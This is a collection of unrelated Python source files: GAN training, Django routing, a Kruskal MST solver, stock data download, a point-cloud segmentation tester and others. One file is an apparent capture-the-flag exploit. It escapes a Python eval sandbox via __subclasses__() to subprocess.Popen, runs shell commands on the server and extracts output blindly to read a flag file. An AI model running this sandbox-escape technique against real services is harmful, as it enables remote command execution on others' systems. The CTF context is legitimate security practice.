g_model = load_model(g_model_file)
else:
d_model = define_discriminator(image_shape)
g_model = define_generator(image_shape)
# ๅฎไนๅคๅๆจกๅ
gan_model = define_gan(g_model, d_model, image_shape)
# ่ฎญ็ปๆจกๅ
train(d_model, g_model, gan_model, dataset)
|
995,268 | 22a39ea204a00e2276e25a3b37361d512d6b9ff6 | # players = ['kobe','allen','T-mac','lebron','KD']
#
# print('Here are the retired basketball players list:')
# for player in players[:3]:
# print(player.title())
# cars = ['lamborghini','ferrari','mclaren','rolls-royce','mercedes','porsche','dodge']
# print('The first three items in the list are:')
# for car in cars[:3]:
# print(car.title())
#
# print("Three items from the middle of the list are:")
# for car in cars[3:6]:
# print(car.title())
my_cars = ['lamborghini','ferrari','mclaren','rolls-royce']
friend_cars = my_cars[:]
print(my_cars)
print(friend_cars)
my_cars.append('mercedes')
friend_cars.append('porsche')
print(my_cars)
print(friend_cars)
print('\nThere are cars that i have:')
for my_car in my_cars:
print(my_car.title())
print('\nThere are cars that my friend have:')
for friend_car in friend_cars:
print(friend_car.title()) |
995,269 | e0792d26b2ec3f7cfe5c4b9e8b18b6331bc7a0ef | from django.conf.urls import include, url
from django.contrib import admin
from graphene_django.views import GraphQLView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^accounts/login/', admin.site.login),
url(r'^graphql/', GraphQLView.as_view(graphiql=True)),
url(
r'^taskmanager/',
include('taskmanager.urls', namespace='taskmanager'),
),
]
|
995,270 | ca12ee155f004ec547db17b422649b9a6c7ee070 | class {{class_name|camel}}Test(unittest.TestCase):
def setUp(self):
pass
def test_{{function_name|snake}}<cursor>(self):
self.assertEqual(<cursor>)
|
995,271 | f437ba345abfca86d377eea7d80ef58b7f9163fc | import math
def citire(nume_fisier="retea2.in"):
n=0
la=[]
with open(nume_fisier) as f:
linie=f.readline()
c, b, m = (int(z) for z in linie.split())
lista = []
coord = []
for i in range(c+b):
x,y=(int(a) for a in f.readline().split())
coord.append((x,y))
for i in range(m):
x, y = (int(a) for a in f.readline().split())
cost = math.sqrt(math.pow(coord[x-1][0]-coord[y-1][0],2)+math.pow(coord[x-1][1]-coord[y-1][1],2))
lista.append((x,y,cost))
return c, b, m, lista
c, b, m, lista = citire()
t = c+b
lista.sort(key=lambda e: e[2])
lm=[]
tata = [0]*(t+1)
h = [0]*(t+1)
def init(u):
tata[u] = h[u] = 0
def reprez(u):
while tata[u] != 0:
u = tata[u]
return u
def union(u, v):
ru=reprez(u)
rv=reprez(v)
if h[ru]>h[rv]:
tata[rv] = ru
else:
tata[ru] = rv
if h[ru] == h[rv]:
h[rv] = h[ru]+1
for i in range(1,t+1):
init(i)
for i in range(1,c):
if c>1:
union(i, i+1)
nrmsel = c-1
cost = 0
for i in range(m):
if reprez(lista[i][0]) != reprez(lista[i][1]):
cost += lista[i][2]
lm.append((lista[i][0], lista[i][1]))
union(lista[i][0], lista[i][1])
nrmsel += 1
if nrmsel == t - 1:
break
print("Costul este",cost)
for i in lm:
print(i[0],i[1]) |
995,272 | fdcdf09b6b4cc35884cf5af113ea75abef2b84e6 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('jobs', '0026_auto_20151004_0422'),
]
operations = [
migrations.AlterField(
model_name='job',
name='job_expiration_date',
field=models.DateTimeField(default=datetime.datetime(2015, 12, 6, 13, 43, 2, 518732)),
),
]
|
995,273 | 05e5ea31e9691d3199ec08814b31098f041b8386 | # Python program to explain cv2.imread() method
# importing cv2
import cv2
# path
path = r'geeksforgeeks.png'
# Using cv2.imread() method
# Using 0 to read image in grayscale mode
img = cv2.imread(path, 0)
# Displaying the image
cv2.imshow('image', img)
|
995,274 | 4e996aaf604db3998419312a10deca7a8e74f880 | import unittest
from main import *
class TestearFormato(unittest.TestCase):
def setUp(self):
self.archivo = open("mensaje_marciano.txt", "r")
self.lineas = self.archivo.readlines()
self.texto = "".join(self.lineas).replace('\n', '')
self.codigo = self.texto.split(" ")
def test_archivo(self):
cantidad = 0
suma = 0
for i in self.codigo:
for k in i:
cantidad += 1
suma += int(k)
self.assertEquals(cantidad, 408)
self.assertEquals(suma, 253)
def tearDown(self):
self.archivo.close()
class TestearMensaje(unittest.TestCase):
def setUp(self):
self.descifrador = Descifrador("mensaje_marciano.txt")
self.archivo = open("mensaje_marciano.txt", "r")
self.lineas = self.archivo.readlines()
self.texto = "".join(self.lineas).replace('\n', '')
self.codigo = self.texto.split(" ")
def test_incorrectos(self):
pass
def test_caracteres(self):
pass
def test_codificacion(self):
for i in self.codigo:
for k in i:
self.assertEquals(k, "1" or "0")
def tearDown(self):
self.archivo.close()
|
995,275 | aae124d10678e4e89ca34d18c62761281851440c | import re
from ..core.comics import BaseComics
class ReadComicOnline(BaseComics):
"""
class for http://readcomiconline.to/
"""
def __init__(self, url):
self._issue_number_regex = r'[(\d)]+'
self._image_regex = r'stImages.push\(\"(.*?)\"\)\;'
self.antibot = True
super(ReadComicOnline, self).__init__(url)
@property
def name(self):
return self.splitted_url[4]
@property
def issue_number(self):
return re.findall(self._issue_number_regex, self.splitted_url[5])[0]
|
995,276 | d35f3fc1e069d5018205282ae99a194caa5b3ac0 | a, k, b, m, n = map(int, input().split())
l, r, ans = 1, n, 0
while (l <= r):
mid = (l + r) // 2
day = mid * a - (mid // k) * a + mid * b - (mid // m) * b
if (day >= n):
r = mid - 1
ans = mid
else:
l = mid + 1
print(ans) |
995,277 | 83c4eca139543658d890c222d16dc6feb4f9f8d5 | #!/usr/bin/python
import requests
import string
import time
import _thread
debug = True
target_url = "http://mentalmath.tamuctf.com/ajax/new_problem"
headers = {
"User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Accept-Encoding": "gzip, deflate, br",
"Origin": "http://mentalmath.tamuctf.com",
"Referer": "http://mentalmath.tamuctf.com/play/",
}
def log_debug(scope, message):
if debug:
print(" DEBUG ({}) | {}".format(scope, message))
def check_python_class(searched_class, mro_index, subclass_index):
#log_debug(searched_class, "search python class > {} in mro={}, subclass={}".format(searched_class, mro_index, subclass_index))
output = ""
found_chars = 0
char_index = 8
for c in searched_class:
data = {"problem": "ord(list(str(''.__class__.mro()[{}].__subclasses__()[{}]))[{}])".format(mro_index, subclass_index, char_index), "answer": "{}".format(ord(c))}
#log_debug(searched_class, data)
response = None
response_ok = False
while not response_ok:
try:
r = requests.post(target_url, headers=headers, data=data)
response = r.text
#log_debug(searched_class, response)
if r.status_code != 502:
response_ok = True
else:
time.sleep(10)
except:
print(" EXCEPTION!")
time.sleep(5 * 60)
if "\"correct\": true" in response:
output += c
#log_debug(searched_class, output)
found_chars += 1
char_index += 1
elif "\"correct\": false" in response or "Server Error" in response:
break
time.sleep(0.5)
if found_chars == len(searched_class):
print("search python class > {} @ ''.__class__.mro()[{}].__subclasses__()[{}]".format(searched_class, mro_index, subclass_index))
def search_python_class_t(searched_class, mro_index):
for subclass_index in range(0, 672):
check_python_class(searched_class, mro_index, subclass_index)
def search_python_class(searched_class):
print("search python class > {}".format(searched_class))
for mro_index in range(0, 3):
_thread.start_new_thread(search_python_class_t, (searched_class, mro_index,))
def launch_remote_stuff(command_skeleton, command):
output = ""
print("remote command > {}".format(command))
finished = False
index = 0
while not finished:
for c in string.printable:
data = {"problem": command_skeleton.format(command, index), "answer": "{}".format(ord(c))}
#log_debug(command, data)
response = None
response_ok = False
while not response_ok:
try:
r = requests.post(target_url, headers=headers, data=data)
response = r.text
#log_debug(command, response)
if r.status_code != 502:
response_ok = True
else:
time.sleep(10)
except:
print(" EXCEPTION!")
time.sleep(5 * 60)
if "\"correct\": true" in response:
output += c
log_debug(command, output)
index += 1
break
elif "Server Error" in response:
finished = True
break
time.sleep(0.5)
print("[{}] > {}".format(command, output))
def launch_remote_python_command(python_command):
launch_remote_stuff("ord(list(str({}))[{}])", python_command)
def launch_remote_shell_command(shell_command):
launch_remote_stuff("ord(list(str(''.__class__.mro()[1].__subclasses__()[208]('{}',shell=True,stdout=-1).communicate()[0].strip()))[{}])", shell_command)
# Exploitation.
#search_python_class("subprocess.Popen") # subprocess.Popen @ ''.__class__.mro()[1].__subclasses__()[208]
#while True:
# pass
#commands = ["ls /", "ls .", "ls /etc", "ls /code", "ls /dev"]
#for command in commands:
# _thread.start_new_thread(launch_remote_shell_command, (command,))
#while True:
# pass
launch_remote_shell_command("cat /code/flag.txt") |
995,278 | 94d5dac3980cbf4ed0af5196303e6dc01b9e40b4 | # -*- encoding:utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from django.utils.decorators import method_decorator
from django.views.generic import TemplateView
from contacts.contacts_register.models import Contact
class IndexView(LoginRequiredMixin, TemplateView):
login_url = 'login/'
template_name = 'dashboard/index.html'
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
context['pagina'] = 'Dashboard'
context['page_title'] = 'Dashboard | Home'
context['dashboard_active'] = 'active'
return context
@method_decorator(login_required(login_url=reverse_lazy('login')))
def dispatch(self, *args, **kwargs):
return super(IndexView, self).dispatch(*args, **kwargs) |
995,279 | a1cd53ed840fd8ab3ae7e293ea6d7347bde6d03d | #-----------------------------------------------------------------------
# potentialgene.py
#-----------------------------------------------------------------------
import sys
import stdio
#-----------------------------------------------------------------------
# Return True if string dna corresponds to a potential gene, that is,
# if its length is a multiple of 3, it starts with the start codon
# (ATG), it ends with a stop codon (TAA or TAG or TGA), and it has
# no intervening stop codons. Otherwise return FALSE.
def isPotentialGene(dna):
# number of bases is a multiple of 3
if (len(dna) % 3) != 0: return False
# starts with start codon
if not dna.startswith('ATG'): return False
# no intervening stop codons
for i in range(len(dna) - 3):
if i % 3 == 0:
if dna[i:i+3] == 'TAA': return False
if dna[i:i+3] == 'TAG': return False
if dna[i:i+3] == 'TGA': return False
# ends with a stop codon
if dna.endswith('TAA'): return True
if dna.endswith('TAG'): return True
if dna.endswith('TGA'): return True
return False
#-----------------------------------------------------------------------
# Accept a DNA sequence as a comand-line argument. Write to
# True to standard output if the DNA sequence corresponds to a
# potential gene, and False otherwise.
dna = sys.argv[1]
stdio.writeln(isPotentialGene(dna))
#-----------------------------------------------------------------------
# python potentialgene.py ATGCGCCTGCGTCTGTACTAG
# True
# python potentialgene.py ATGCGCTGCGTCTGTACTAG
# False
|
995,280 | 3e883ba708039e577444479971d2e0bf4aef4790 | # http://www.runoob.com/python/python-func-type.html
# TODO;Python type() ๅฝๆฐ
"""
ๆ่ฟฐ
type() ๅฝๆฐๅฆๆไฝ ๅชๆ็ฌฌไธไธชๅๆฐๅ่ฟๅๅฏน่ฑก็็ฑปๅ๏ผไธไธชๅๆฐ่ฟๅๆฐ็็ฑปๅๅฏน่ฑกใ
isinstance() ไธ type() ๅบๅซ๏ผ
type() ไธไผ่ฎคไธบๅญ็ฑปๆฏไธ็ง็ถ็ฑป็ฑปๅ๏ผไธ่่็ปงๆฟๅ
ณ็ณปใ
isinstance() ไผ่ฎคไธบๅญ็ฑปๆฏไธ็ง็ถ็ฑป็ฑปๅ๏ผ่่็ปงๆฟๅ
ณ็ณปใ
ๅฆๆ่ฆๅคๆญไธคไธช็ฑปๅๆฏๅฆ็ธๅๆจ่ไฝฟ็จ isinstance()ใ
่ฏญๆณ
ไปฅไธๆฏ type() ๆนๆณ็่ฏญๆณ:
class type(name, bases, dict)
ๅๆฐ
name -- ็ฑป็ๅ็งฐใ
bases -- ๅบ็ฑป็ๅ
็ปใ
dict -- ๅญๅ
ธ๏ผ็ฑปๅ
ๅฎไน็ๅฝๅ็ฉบ้ดๅ้ใ
่ฟๅๅผ
ไธไธชๅๆฐ่ฟๅๅฏน่ฑก็ฑปๅ, ไธไธชๅๆฐ๏ผ่ฟๅๆฐ็็ฑปๅๅฏน่ฑกใ
"""
# ไธไธชๅๆฐๅฎไพ
print(type('aaaaa'))
print(type(1))
print(type(1.00000))
# ไธไธชๅๆฐ
class X(object):
a = 1
print(type('X', (object,), dict(a=1)))
|
995,281 | 456f609dea564b9355bd908cc8628538343db633 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: vita
import re
from collections import OrderedDict
from django.conf import settings
from django.utils.module_loading import import_string
from django.urls import URLResolver, URLPattern
from django.urls.resolvers import RegexPattern, RoutePattern
def check_url_exclude(url):
"""
่ชๅจๅ็ฐURL๏ผ่ฟ้ๆฏๆ้ค็URL๏ผไธ้่ฆ่ชๅจๅ็ฐ๏ผๅฑ็คบๅจ้กต้ขไธญ
:param url:
:return:
"""
for item in settings.AUTO_DISCOVER_EXCLUDE:
if re.match(item, url):
return True
def recursion_urls(pre_namespace, pre_url, urlpatterns, url_ordered_dict):
"""
้ๅฝ็ๅป่ทๅURL,ๅช่ทๅๆname็url
:param pre_namespace: namespaceๅ็ผ๏ผไปฅๅ็จๆทๆผๆฅname
:param pre_url: urlๅ็ผ๏ผไปฅๅ็จไบๆผๆฅurl
:param urlpatterns: ่ทฏ็ฑๅ
ณ็ณปๅ่กจ
:param url_ordered_dict: ็จไบไฟๅญ้ๅฝไธญ่ทๅ็ๆๆ่ทฏ็ฑ
:return:
"""
for item in urlpatterns:
# # ้่ทฏ็ฑๅๅ๏ผๅณไธๆฏinclude(),ๅฐ่ทฏ็ฑๆทปๅ ๅฐurl_ordered_dict
if isinstance(item, URLPattern):
# ๅฆๆๆฒกๆ่ฎพ็ฝฎๅซๅ๏ผๅฐฑ็ฅ่ฟ๏ผๅชไฟๅญๆๅซๅ็URL
if not item.name:
continue
if pre_namespace:
name = "%s:%s" % (pre_namespace, item.name)
else:
name = item.name
pattern = ""
# urls.pyไธญ้
็ฝฎ็url
if isinstance(item.pattern, URLPattern) or isinstance(item.pattern, RoutePattern):
pattern = item.pattern._route
elif isinstance(item.pattern, RegexPattern):
pattern = item.pattern._regex
url = pre_url + pattern # /rbac/user/edit/(?P<pk>\d+)/
# ๅปๆurlไธญ็่ตทๅง็ฌฆๅ็ปๆ็ฌฆ
url = url.replace("^", "").replace("$", "")
if check_url_exclude(url):
continue
url_ordered_dict[name] = {"name": name, "url": url}
elif isinstance(item, URLResolver): # ่ทฏ็ฑๅๅ๏ผ้ๅฝๆไฝ
namespace = None
if pre_namespace:
if item.namespace:
namespace = "%s:%s" % (pre_namespace, item.namespace)
else:
if item.namespace:
namespace = item.namespace
# patternๆฏ่ทๅ้
็ฝฎ็url,
pattern = ""
if isinstance(item.pattern, URLPattern) or isinstance(item.pattern, RoutePattern):
pattern = item.pattern._route
elif isinstance(item.pattern, RegexPattern):
pattern = item.pattern._regex
recursion_urls(namespace, pre_url + pattern, item.url_patterns, url_ordered_dict)
def get_all_url_dict():
"""
่ทๅ้กน็ฎไธญๆๆ็URL(ๅฟ
้กปๆnameๅซๅ)
:return:
"""
# <URLResolver <URLPattern list> (admin:admin) 'admin/'>
# <URLResolver <module 'web.urls' from '**permission\\web\\urls.py'> (web:web) '^'>
# <URLResolver <module 'rbac.urls' from '**permission\\rbac\\urls.py'> (rbac:rbac) 'rbac/'>
# <URLPattern '^user/list/$' [name='user_list']>
# urlpatterns = [
# path('admin/', admin.site.urls),
# re_path(r'^', include('web.urls', namespace="web")),
# re_path(r'rbac/', include('rbac.urls', namespace="rbac")),
# re_path(r'^user/list/$', user.user_list, name='user_list'),
# ]
# for item in md.urlpatterns:
# print(item)
# ๆ นๆฎๅญ็ฌฆไธฒ็ๅ
ๅฎน๏ผ่ฟ่กๆจกๅ็ๅฏผๅ
ฅ
# import PHM.urls
md = import_string(settings.ROOT_URLCONF)
# ๆๅบๅญๅ
ธ
url_ordered_dict = OrderedDict()
"""
{
"rbac:menu_list":{name:'rbac:menu_list',url:"/rbac/menu/list/"}
}
"""
# ้ๅฝ็ๅป่ทๅๆๆ็่ทฏ็ฑ๏ผ
# ็ฌฌไธๆฌก๏ผnamespaceไธบ็ฉบ
recursion_urls(None, "/", md.urlpatterns, url_ordered_dict)
print("url_ordered_dict-----------------", url_ordered_dict)
return url_ordered_dict
# OrderedDict([('rbac:role_list', {'name': 'rbac:role_list', 'url': '/rbac/role/list/'}),
# ('rbac:role_add', {'name': 'rbac:role_add', 'url': '/rbac/role/add/'}),
# ('rbac:role_edit', {'name': 'rbac:role_edit', 'url': '/rbac/role/edit/(?P<pk>\\d+)/'}),
# ('rbac:role_del', {'name': 'rbac:role_del', 'url': '/rbac/role/del/(?P<pk>\\d+)/'}),
# ('rbac:menu_list', {'name': 'rbac:menu_list', 'url': '/rbac/menu/list/'}),
# ('rbac:menu_add', {'name': 'rbac:menu_add', 'url': '/rbac/menu/add/'}),
# ('rbac:menu_edit', {'name': 'rbac:menu_edit', 'url': '/rbac/menu/edit/(?P<pk>\\d+)/'}),
# ('rbac:menu_del', {'name': 'rbac:menu_del', 'url': '/rbac/menu/del/(?P<pk>\\d+)/'}),
# ('rbac:second_menu_add', {'name': 'rbac:second_menu_add', 'url': '/rbac/second/menu/add/(?P<menu_id>\\d+)/'}),
# ('rbac:second_menu_edit', {'name': 'rbac:second_menu_edit', 'url': '/rbac/second/menu/edit/(?P<pk>\\d+)/'}),
# ('rbac:second_menu_del', {'name': 'rbac:second_menu_del', 'url': '/rbac/second/menu/del/(?P<pk>\\d+)/'}),
# ('rbac:permission_add', {'name': 'rbac:permission_add', 'url': '/rbac/permission/add/(?P<second_menu_id>\\d+)/'}),
# ('rbac:permission_edit', {'name': 'rbac:permission_edit', 'url': '/rbac/permission/edit/(?P<pk>\\d+)/'}),
# ('rbac:permission_del', {'name': 'rbac:permission_del', 'url': '/rbac/permission/del/(?P<pk>\\d+)/'})])
|
995,282 | 387c0b8d8816c6bb045b0b4537a980264568c666 | # ### 2. Write a function power(a,b) to calculate the value of a raised to b.
# * Function: power()
# * Summary: Finds a^b
# * Input: a and b
# * Output: a^b
# In[16]:
def power(n,p):
if p==0:
return 1
elif p==1:
return n
else:
return n*power(n,p-1)
print(power(3,4))
|
995,283 | b58594af85b9860074984c7ef963f03dd500d0bb | class Solution:
# @param prices, a list of integer
# @return an integer
def maxProfit(self, prices):
if len(prices) < 2 : return 0
ret = [ prices[i+1] - prices[i] for i in range(len(prices)-1)]
sumRet = ret[0]
maxRet = max(ret[0], 0)
minRet = min(ret[0], 0)
for i in xrange(1, len(ret)):
sumRet += ret[i]
maxRet = max(maxRet, sumRet-minRet)
minRet = min(minRet, sumRet)
return maxRet
|
995,284 | 51fb747f73e3bcdc0d4c27f78c830064192428c1 | import numpy as np
import pandas as pd
from pandas import Series, DataFrame
import tushare as ts
import os
# ๅพๅฐ000001่ฟไธๅนด็ๆฐๆฎ
# ts.get_hist_data ็ธๅ
ณๆฐๆฎ indexไธบdate+ๆถ้ด
# open high close low volume price_change p_changeๆถจ่ทๅน
ma5 ma10 ma20 v_ma5 v_ma10 v_ma20 turnoverๆขๆ็
open('000001_Month.csv','w')
df=ts.get_hist_data('000001',ktype='M') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_Month.csv')
open('000001_Week.csv','w')
df=ts.get_hist_data('000001',ktype='W') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_Week.csv')
open('000001_Daily.csv','w')
df=ts.get_hist_data('000001') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_Daily.csv')
open('000001_60_Mins.csv','w')
df=ts.get_hist_data('000001',ktype='60') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_60_Mins.csv')
open('000001_30_Mins.csv','w')
df=ts.get_hist_data('000001',ktype='30') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_30_Mins.csv')
open('000001_15_Mins.csv','w')
df=ts.get_hist_data('000001',ktype='15') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_15_Mins.csv')
open('000001_5_Mins.csv','w')
df=ts.get_hist_data('000001',ktype='5') #่ทๅไธ่ฏๆๆฐk็บฟๆฐๆฎ
df.to_csv('000001_5_Mins.csv')
# ๅๅฒๅ็ฌๆฐๆฎ ่ทๅ2016-01-11ไปฅๅ2016-01-12็ๅ็ฌๆฐๆฎ
open('000001_fb060111.csv','w')
df = ts.get_tick_data('000001',date='2016-01-11')
df.to_csv('000001_fb060111.csv')
open('000001_fb060112.csv','w')
df = ts.get_tick_data('000001',date='2016-01-12')
df.to_csv('000001_fb060112.csv')
# # ๅคงๅไบคๆๆฐๆฎ ่ทๅ2016-01-11ไปฅๅ2016-01-12็ๅคงไบ600ๆ็ๆฐๆฎ๏ผ็ฎๅ่ฟไธชๆฐๆฎๅฏ่ฝๅบ็ฐไบbug
# open('000001_ddsj060111.csv','w')
# df = ts.get_sina_dd('000001', date='2016-01-11', vol=500) #ๆๅฎๅคงไบ็ญไบ500ๆ็ๆฐๆฎ
# df.to_csv('000001_ddsj060111.csv')
#
# open('000001_ddsj060112.csv','w')
# df = ts.get_sina_dd('000001', date='2016-01-12', vol=500) #ๆๅฎๅคงไบ็ญไบ500ๆ็ๆฐๆฎ
# df.to_csv('000001_ddsj060112.csv')
|
995,285 | aa545cb29f3ecaec6d90b1b635fca2c5edbe156b |
string1 = input()
string2 = input()
if string1 == string2 :
print("are equal")
else:
print("are not equal")
if string2 in string1 or string1 in string2 :
print(" is a substring")
else:
print("is not a substring")
|
995,286 | 18a633bc4aae37694afe182b10fcc72d0c0b8e1a | # Modified by Wei Jiacheng
#
#
# Originally written by Hugues THOMAS - 11/06/2018
#
# ----------------------------------------------------------------------------------------------------------------------
#
# Imports and global variables
# \**********************************/
#
# Basic libs
import tensorflow as tf
import numpy as np
from os import makedirs, listdir
from os.path import exists, join
import time
from sklearn.neighbors import KDTree
# PLY reader
from utils.ply import read_ply, write_ply
# Metrics
from utils.metrics import IoU_from_confusions
from sklearn.metrics import confusion_matrix
from tensorflow.python.client import timeline
import json
# ----------------------------------------------------------------------------------------------------------------------
#
# Tester Class
# \******************/
#
class TimeLiner:
def __init__(self):
self._timeline_dict = None
def update_timeline(self, chrome_trace):
# convert crome trace to python dict
chrome_trace_dict = json.loads(chrome_trace)
# for first run store full trace
if self._timeline_dict is None:
self._timeline_dict = chrome_trace_dict
# for other - update only time consumption, not definitions
else:
for event in chrome_trace_dict['traceEvents']:
# events time consumption started with 'ts' prefix
if 'ts' in event:
self._timeline_dict['traceEvents'].append(event)
def save(self, f_name):
with open(f_name, 'w') as f:
json.dump(self._timeline_dict, f)
class ModelTester:
# Initiation methods
# ------------------------------------------------------------------------------------------------------------------
def __init__(self, model, restore_snap=None):
# Tensorflow Saver definition
my_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='KernelPointNetwork')
self.saver = tf.train.Saver(my_vars, max_to_keep=100)
# Create a session for running Ops on the Graph.
on_CPU = False
if on_CPU:
cProto = tf.ConfigProto(device_count={'GPU': 0})
else:
cProto = tf.ConfigProto()
cProto.gpu_options.allow_growth = True
self.sess = tf.Session(config=cProto)
# Init variables
self.sess.run(tf.global_variables_initializer())
# Name of the snapshot to restore to (None if you want to start from beginning)
# restore_snap = join(self.saving_path, 'snapshots/snap-40000')
if (restore_snap is not None):
self.saver.restore(self.sess, restore_snap)
print("Model restored from " + restore_snap)
# Add a softmax operation for predictions
self.prob_logits_softmax = tf.nn.softmax(model.logits)
self.prob_logits = model.logits
# Test main methods
# ------------------------------------------------------------------------------------------------------------------
def test_classification(self, model, dataset, num_votes=30):
# Initialise iterator with test data
self.sess.run(dataset.test_init_op)
# Number of classes predicted by the model
nc_model = model.config.num_classes
# Initiate votes
average_probs = np.zeros((len(dataset.input_labels['test']), nc_model))
average_counts = np.zeros((len(dataset.input_labels['test']), nc_model))
mean_dt = np.zeros(2)
last_display = time.time()
while np.min(average_counts) < num_votes:
# Run model on all test examples
# ******************************
# Initiate result containers
probs = []
targets = []
obj_inds = []
count = 0
while True:
try:
# Run one step of the model
t = [time.time()]
ops = (self.prob_logits, model.labels, model.inputs['object_inds'])
prob, labels, inds = self.sess.run(ops, {model.dropout_prob: 1.0})
t += [time.time()]
# Get probs and labels
probs += [prob]
targets += [labels]
obj_inds += [inds]
count += prob.shape[0]
# Average timing
t += [time.time()]
mean_dt = 0.95 * mean_dt + 0.05 * (np.array(t[1:]) - np.array(t[:-1]))
# Display
if (t[-1] - last_display) > 1.0:
last_display = t[-1]
message = 'Vote {:.0f} : {:.1f}% (timings : {:4.2f} {:4.2f})'
print(message.format(np.min(average_counts),
100 * count / dataset.num_test,
1000 * (mean_dt[0]),
1000 * (mean_dt[1])))
except tf.errors.OutOfRangeError:
break
# Average votes
# *************
# Stack all validation predictions
probs = np.vstack(probs)
targets = np.hstack(targets)
obj_inds = np.hstack(obj_inds)
if np.any(dataset.input_labels['test'][obj_inds] != targets):
raise ValueError('wrong object indices')
# Compute incremental average (predictions are always ordered)
average_counts[obj_inds] += 1
average_probs[obj_inds] += (probs - average_probs[obj_inds]) / (average_counts[obj_inds])
# Save/Display temporary results
# ******************************
test_labels = np.array(dataset.label_values)
# Compute classification results
C1 = confusion_matrix(dataset.input_labels['test'],
np.argmax(average_probs, axis=1),
test_labels)
ACC = 100 * np.sum(np.diag(C1)) / (np.sum(C1) + 1e-6)
print('Test Accuracy = {:.1f}%'.format(ACC))
s = ''
for cc in C1:
for c in cc:
s += '{:d} '.format(c)
s += '\n'
print(s)
# Initialise iterator with test data
self.sess.run(dataset.test_init_op)
return
def test_cloud_segmentation(self, model, dataset, num_votes=100):
##########
# Initiate
##########
# Smoothing parameter for votes
test_smooth = 0.98
# Initialise iterator with train data
self.sess.run(dataset.test_init_op)
# Initiate global prediction over test clouds
nc_model = model.config.num_classes
self.test_probs = [np.zeros((l.data.shape[0], nc_model), dtype=np.float32) for l in dataset.input_trees['test']]
# Test saving path
if model.config.saving:
test_path = join('test', model.saving_path.split('/')[-1])
if not exists(test_path):
makedirs(test_path)
if not exists(join(test_path, 'predictions')):
makedirs(join(test_path, 'predictions'))
if not exists(join(test_path, 'probs')):
makedirs(join(test_path, 'probs'))
else:
test_path = None
#####################
# Network predictions
#####################
options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
many_runs_timeline = TimeLiner()
i0 = 0
epoch_ind = 0
last_min = -0.5
mean_dt = np.zeros(2)
last_display = time.time()
while last_min < num_votes:
try:
# Run one step of the model.
t = [time.time()]
ops = (self.prob_logits,
model.labels,
model.inputs['in_batches'],
model.inputs['point_inds'],
model.inputs['cloud_inds'])
stacked_probs, labels, batches, point_inds, cloud_inds = self.sess.run(ops,
{model.dropout_prob: 1.0})
"""
stacked_probs, labels, batches, point_inds, cloud_inds = self.sess.run(ops,
{model.dropout_prob: 1.0},
options=options,
run_metadata=run_metadata)
"""
t += [time.time()]
#fetched_timeline = timeline.Timeline(run_metadata.step_stats)
#chrome_trace = fetched_timeline.generate_chrome_trace_format()
#many_runs_timeline.update_timeline(chrome_trace)
if False:
many_runs_timeline.save('timeline_merged_%d_runs.json' % i0)
a = 1/0
# Get predictions and labels per instance
# ***************************************
# Stack all predictions for each class separately
max_ind = np.max(batches)
for b_i, b in enumerate(batches):
# Eliminate shadow indices
b = b[b < max_ind - 0.5]
# Get prediction (only for the concerned parts)
probs = stacked_probs[b]
inds = point_inds[b]
c_i = cloud_inds[b_i]
# Update current probs in whole cloud
self.test_probs[c_i][inds] = test_smooth * self.test_probs[c_i][inds] + (1-test_smooth) * probs
# Average timing
t += [time.time()]
#print(batches.shape, stacked_probs.shape, 1000*(t[1] - t[0]), 1000*(t[2] - t[1]))
mean_dt = 0.95 * mean_dt + 0.05 * (np.array(t[1:]) - np.array(t[:-1]))
# Display
if (t[-1] - last_display) > 1.0:
last_display = t[-1]
message = 'Epoch {:3d}, step {:3d} (timings : {:4.2f} {:4.2f}). min potential = {:.1f}'
print(message.format(epoch_ind,
i0,
1000 * (mean_dt[0]),
1000 * (mean_dt[1]),
np.min(dataset.min_potentials['test'])))
i0 += 1
except tf.errors.OutOfRangeError:
# Save predicted cloud
new_min = np.min(dataset.min_potentials['test'])
print('Epoch {:3d}, end. Min potential = {:.1f}'.format(epoch_ind, new_min))
print([np.mean(pots) for pots in dataset.potentials['test']])
if last_min + 2 < new_min:
print('Saving clouds')
# Update last_min
last_min = new_min
# Project predictions
print('\nReproject Vote #{:d}'.format(int(np.floor(new_min))))
t1 = time.time()
files = dataset.test_files
i_test = 0
for i, file_path in enumerate(files):
# Get file
points = dataset.load_evaluation_points(file_path)
# Reproject probs
probs = self.test_probs[i_test][dataset.test_proj[i_test], :]
# Insert false columns for ignored labels
probs2 = probs.copy()
for l_ind, label_value in enumerate(dataset.label_values):
if label_value in dataset.ignored_labels:
probs2 = np.insert(probs2, l_ind, 0, axis=1)
# Get the predicted labels
preds = dataset.label_values[np.argmax(probs2, axis=1)].astype(np.int32)
# Project potentials on original points
pots = dataset.potentials['test'][i_test][dataset.test_proj[i_test]]
# Save plys
cloud_name = file_path.split('/')[-1]
test_name = join(test_path, 'predictions', cloud_name)
write_ply(test_name,
[points, preds, pots],
['x', 'y', 'z', 'preds', 'pots'])
test_name2 = join(test_path, 'probs', cloud_name)
prob_names = ['_'.join(dataset.label_to_names[label].split()) for label in dataset.label_values
if label not in dataset.ignored_labels]
write_ply(test_name2,
[points, probs],
['x', 'y', 'z'] + prob_names)
# Save ascii preds
if dataset.name.startswith('Semantic3D'):
ascii_name = join(test_path, 'predictions', dataset.ascii_files[cloud_name])
else:
ascii_name = join(test_path, 'predictions', cloud_name[:-4] + '.txt')
